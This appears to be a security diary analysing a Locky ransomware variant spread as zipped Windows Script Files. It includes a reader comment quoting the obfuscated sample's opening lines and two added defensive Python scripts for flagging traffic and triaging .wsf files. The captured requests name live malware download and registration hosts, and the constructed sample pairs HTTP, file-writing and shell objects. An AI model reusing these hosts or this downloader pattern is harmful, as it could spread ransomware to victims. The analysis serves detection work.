Today's Locky Variant Arrives as a Windows Script File
Pretty much all the Locky variants I have looked at over the last couple of days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the attachment was a zipped Windows Script File (.wsf). Overall, this isn't all that different: a "Windows Script" file is essentially JavaScript (JScript) wrapped in an XML package that wscript.exe executes. The only difference is the
Today's e-mail subject was "Transaction details". Once the user runs the script by double-clicking the file, it downloads the actual crypto ransomware:
GET /2tn0o HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: onlybest76.xyz
Connection: Keep-Alive
Just like earlier versions, it then "registers" the infected system with a web server that is identified only by its IP address, so you will not see a DNS lookup for it:
POST /data/info.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://95.85.19.195/data/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 95.85.19.195
Content-Length: 942
Connection: Keep-Alive
[post data omitted]
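The two requests above carry detectable traits even without a signature for the sample: the registration POST goes to a literal IP in the Host header (no name resolution), is marked as an XMLHttpRequest call with a Referer on the same bare IP, and both requests use a User-Agent that claims MSIE 7.0 on Windows NT 10.0, a pairing no real browser produces since IE7 never shipped on Windows 10. The following Python is an added example, not part of the diary or its capture: it scores raw HTTP requests against those heuristics. The request strings are constructed for the example and modelled on the two requests shown (the header lists are shortened); the indicator names and thresholds are my own choices, and the short-path and UA checks are weak indicators meant for correlation, not for blocking on their own.

```python
import re

# Constructed sample requests, modelled on the download GET and the registration
# POST shown in the diary, plus one benign browser request as a control.
# These are not captured traffic.
SAMPLE_REQUESTS = [
    "GET /2tn0o HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E)\r\n"
    "Host: onlybest76.xyz\r\nConnection: Keep-Alive\r\n\r\n",
    "POST /data/info.php HTTP/1.1\r\nAccept: */*\r\nReferer: http://95.85.19.195/data/\r\n"
    "x-requested-with: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0)\r\n"
    "Host: 95.85.19.195\r\nContent-Length: 942\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n\r\n",
]


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers); header names lowercased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_bare_ip(host):
    """True if the host is a dotted-quad IPv4 literal, with an optional :port."""
    m = re.fullmatch(r"(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?", host)
    return m is not None and all(int(octet) < 256 for octet in m.group(1).split("."))


def score_request(raw):
    """Return the list of indicator names (hypothetical labels) that fire for one request."""
    method, path, h = parse_request(raw)
    host = h.get("host", "")
    ua = h.get("user-agent", "")
    hits = []
    # 1. Host header is a literal IP: the client never resolved a name, which is
    #    why the diary saw no DNS lookup for the registration server.
    if is_bare_ip(host):
        hits.append("host-is-bare-ip")
    # 2. AJAX-style POST straight to that bare IP.
    if method == "POST" and is_bare_ip(host) and h.get("x-requested-with", "").lower() == "xmlhttprequest":
        hits.append("xhr-post-to-bare-ip")
    # 3. Referer that also points at a bare IP (here, the same server).
    referer = h.get("referer", "")
    if referer and is_bare_ip(re.sub(r"^https?://([^/]+).*$", r"\1", referer)):
        hits.append("referer-is-bare-ip")
    # 4. "MSIE 7.0" on "Windows NT 10.0": IE7 never existed on Windows 10, so this
    #    compatibility-mode string comes from a non-browser component using the
    #    system HTTP stack. Weak indicator on its own; useful in combination.
    if "MSIE 7.0" in ua and "Windows NT 10.0" in ua:
        hits.append("msie7-on-win10-ua")
    # 5. Short opaque path on a GET (e.g. /2tn0o): weak indicator, many false positives.
    if method == "GET" and re.fullmatch(r"/[a-z0-9]{4,8}", path):
        hits.append("short-opaque-path")
    return hits


def triage(requests):
    """Map request index -> indicators, so a batch from a pcap or proxy log can be ranked."""
    return {i: score_request(r) for i, r in enumerate(requests)}


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_REQUESTS).items():
        print(idx, hits or "clean")
```

Run against requests extracted from a proxy log or a pcap (e.g. with tshark's `http.request` fields), a host that fires `host-is-bare-ip` plus `xhr-post-to-bare-ip` within seconds of an `msie7-on-win10-ua` GET to a freshly registered domain is a strong lead for this family of downloaders, whereas any single indicator will also match plenty of legitimate software.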
Anti-malware proves its usual value by doing probably slightly better than a blind chicken at protecting you from this malware. You can download a file with the packet capture, mail server logs, and the malware sample here (password: "blind chicken").
Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.
Comments
Anonymous
Aug 31st 2016
I'm pretty sure I just got some malware in the form of a ZIP file containing a .wsf file (XML text). It's a bit long to paste. First few lines:
<?xml?>
<package>
<job id='oevPEW'><script language='JScript'></script><script language='JScript'><![CDATA[
String.prototype.toshibasatelliteLAMODAtiiiyamooo = function() {
If this is of any interest, let me know the best way to get it to you. I'm on an Air Force base, so I may not be able to use methods that work for everyone else.
Thanks.
--
Karl Vogel
vogelke+isc@pobox.com
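The file quoted in the comment above shows the usual .wsf layout: an XML package with a job element holding one or more script elements, the real code inside a CDATA section, and an obfuscation helper hung on String.prototype. The following Python is an added example, not code from the diary or from the commenter: it pulls the script bodies out of a .wsf and reports the features a triage analyst looks at first. The sample .wsf is constructed for the example, modelled on the first four lines posted above; the function body and the three ActiveXObject ProgIDs in it are made up to exercise the checks and are not the contents of the actual attachment. It deliberately uses regular expressions instead of an XML parser, because files like this one (which opens with a bare `<?xml?>`) are frequently not well-formed XML even though wscript.exe runs them.

```python
import re

# Constructed sample, modelled on the first lines of the .wsf quoted in the comment.
# The script body below is invented for this example; it is not the real downloader.
SAMPLE_WSF = """<?xml?>
<package>
<job id='oevPEW'><script language='JScript'></script><script language='JScript'><![CDATA[
String.prototype.toshibasatelliteLAMODAtiiiyamooo = function() { return this.split("").reverse().join(""); };
var hlsxm = new ActiveXObject("MSXML2.XMLHTTP");
var maerts = new ActiveXObject("ADODB.Stream");
var llehs = new ActiveXObject("WScript.Shell");
]]></script></job>
</package>
"""

SCRIPT_RE = re.compile(r"<script\s+language=['\"]([^'\"]+)['\"]\s*>(.*?)</script>", re.S | re.I)
JOB_RE = re.compile(r"<job\s+id=['\"]([^'\"]+)['\"]", re.I)
CDATA_RE = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)
# Methods bolted onto built-in prototypes are a common string-decoding trick in these droppers.
PROTO_RE = re.compile(r"(String|Array|Object)\.prototype\.(\w+)\s*=\s*function")
# COM objects the script instantiates: the HTTP client, file writer and process launcher
# tell you what the script is able to do before you deobfuscate a single string.
ACTIVEX_RE = re.compile(r"ActiveXObject\(\s*['\"]([^'\"]+)['\"]\s*\)")


def extract_scripts(wsf_text):
    """Return [(language, body)] for every <script> element, unwrapping a CDATA section if present.

    Regex instead of xml.etree on purpose: a file starting with '<?xml?>' is not
    well-formed XML and an XML parser would reject it, yet the script host runs it.
    """
    scripts = []
    for language, body in SCRIPT_RE.findall(wsf_text):
        m = CDATA_RE.search(body)
        scripts.append((language, (m.group(1) if m else body).strip()))
    return scripts


def triage_wsf(wsf_text):
    """Summarise the structural features of a .wsf that matter for a first look."""
    scripts = extract_scripts(wsf_text)
    code = "\n".join(body for _, body in scripts)
    return {
        "jobs": JOB_RE.findall(wsf_text),
        "script_count": len(scripts),
        "empty_scripts": sum(1 for _, body in scripts if not body),
        "languages": sorted({language for language, _ in scripts}),
        "prototype_overrides": [f"{t}.prototype.{name}" for t, name in PROTO_RE.findall(code)],
        "activex_progids": ACTIVEX_RE.findall(code),
        "script_bytes": len(code),
    }


if __name__ == "__main__":
    for key, value in triage_wsf(SAMPLE_WSF).items():
        print(f"{key}: {value}")
```

On a real attachment, run `triage_wsf(open(path, encoding="utf-8", errors="replace").read())` on a non-Windows analysis host; a JScript job that combines an HTTP client, a binary file writer and a shell object is a downloader regardless of how the strings are scrambled, and the prototype-override list gives you the decoding function to start with when you do go on to deobfuscate it.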